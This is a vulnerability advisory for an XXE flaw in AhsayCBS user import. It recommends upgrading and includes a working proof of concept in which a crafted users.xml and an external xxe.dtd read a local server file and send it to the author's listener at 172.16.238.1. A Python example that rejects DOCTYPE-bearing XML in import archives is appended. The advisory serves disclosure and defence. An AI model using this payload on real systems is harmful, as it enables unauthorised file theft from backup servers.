Advisory

Upgrade to the latest version of Ahsay, currently 8.1.1.50 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp)

Technical details

For this we need a couple of things.

A webserver to serve xxe.dtd. We also need a webserver to receive the server's response. First we need to create a zip file containing users.xml; users.xml must contain the following:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://172.16.238.1/xxe.dtd">
<settings>&send;</settings> 

Then we need to create the file xxe.dtd, which names the file we want to read. The content of that file is then sent to our listening server.

<!ENTITY % file SYSTEM "file:///C:\\Program Files\\AhsayCBS\\version.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://172.16.238.1/?%file;'>">
%all;   

Now we need to start a webserver. I use Python for this on my system, 172.16.238.1.

Run the following command in the directory containing the .dtd file:

python -m SimpleHTTPServer 80

There will now be a webserver listening on port 80. In the application, go to the “Move / Import / Export Users” page, choose the option import users to and select the zip file we created.

Screenshot: importing the zip file and saving it.

Screenshot: When the save button is hit, our webserver immediately receives a request for the dtd file. This file gets processed and sends the content, 8.1.0.50, to our server.
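
For systems that cannot be upgraded immediately, an import archive can be screened before it reaches the XML parser. The following is an added example, not code from the advisory or from Ahsay: it rejects any XML member of a zip that carries a DOCTYPE declaration, which is what the users.xml above relies on. The function names and the idea of a pre-import screening step are assumptions; the sample archives are constructed in memory.

```python
import io
import zipfile
from xml.parsers import expat


class DoctypeRejected(Exception):
    """Raised when an XML member of the archive declares a DTD."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this as soon as it sees <!DOCTYPE ...>, before any entity is used.
    raise DoctypeRejected(f"DOCTYPE {name!r} references {system_id!r}")


def check_xml(data: bytes) -> None:
    """Parse data with expat; raise DoctypeRejected on any DOCTYPE declaration."""
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _reject_doctype
    parser.Parse(data, True)


def screen_import_zip(blob: bytes) -> list:
    """Return (member, reason) pairs for XML members that must not be imported."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".xml"):
                continue
            try:
                check_xml(zf.read(info))
            except DoctypeRejected as exc:
                findings.append((info.filename, str(exc)))
            except expat.ExpatError as exc:
                findings.append((info.filename, f"not well-formed: {exc}"))
    return findings


def make_zip(xml: bytes) -> bytes:
    """Build an in-memory zip holding a single users.xml (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("users.xml", xml)
    return buf.getvalue()


# Constructed samples: the users.xml shown on this page, and a DTD-free one.
WITH_DTD = (b'<?xml version="1.0" encoding="utf-8"?>\n'
            b'<!DOCTYPE data SYSTEM "http://172.16.238.1/xxe.dtd">\n'
            b'<settings>&send;</settings>')
PLAIN = b'<?xml version="1.0" encoding="utf-8"?>\n<settings>ok</settings>'
```

An empty list from screen_import_zip means no XML member declared a DTD. On the server side, outbound HTTP requests for a .dtd file made right after a user import are the matching signal to look for in proxy or firewall logs.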